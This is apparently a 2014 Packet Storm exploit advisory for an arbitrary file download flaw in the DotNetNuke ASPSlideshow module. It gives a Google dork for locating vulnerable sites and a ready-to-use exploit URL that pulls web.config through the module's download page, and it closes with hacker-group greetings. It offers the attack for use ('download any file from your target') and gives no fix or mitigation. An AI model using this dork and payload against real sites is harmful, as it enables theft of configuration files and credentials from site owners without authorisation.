DotNetNuke ASPSlideshow Arbitrary File Download

2014-06-09T00:00:00
ID PACKETSTORM:126995
Type packetstorm
Reporter alieye
Modified 2014-06-09T00:00:00

Description

                                        
                                            `#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Title : DNN (DotNetNuke®) ASPSlideshow Module Arbitrary File Download Vulnerability  
# Author : alieye  
# vendor : http://www.mediaant.com/ , http://store.dnnsoftware.com/  
# Contact : cseye_ut@yahoo.com  
# Risk : High  
# Class: Remote  
# Google Dork: inurl:/DesktopModules/+inurl:/ASPSlideshow/  
# Version: all version  
# Date: 09/06/2014  
# os : windows server 2008  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
  
You can download any file from your target ;)  
  
  
Exploit : http://victim.com/DesktopModules/ASPSlideShow/ASPSlideShowDownload.aspx?ID=~/web.config  
  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members  
[#] Thanks To All Iranian Hackers  
[#] website : http://cseye.vcp.ir/  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
`